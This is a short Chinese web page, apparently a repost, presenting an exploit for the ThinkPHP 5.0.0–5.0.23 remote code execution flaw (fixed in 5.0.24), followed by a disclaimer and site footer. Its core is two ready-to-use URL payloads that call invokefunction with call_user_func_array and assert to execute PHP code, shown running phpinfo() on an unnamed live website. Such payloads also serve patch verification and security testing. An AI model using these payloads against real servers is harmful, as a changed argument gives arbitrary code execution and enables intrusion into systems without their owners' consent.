ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用


漏洞影响范围: 5.0.0-5.0.23

官方已在5.0.24版本修复该漏洞。
测试Payload:

/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

以某个网站为例,可以看到成功执行phpinfo()函数。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM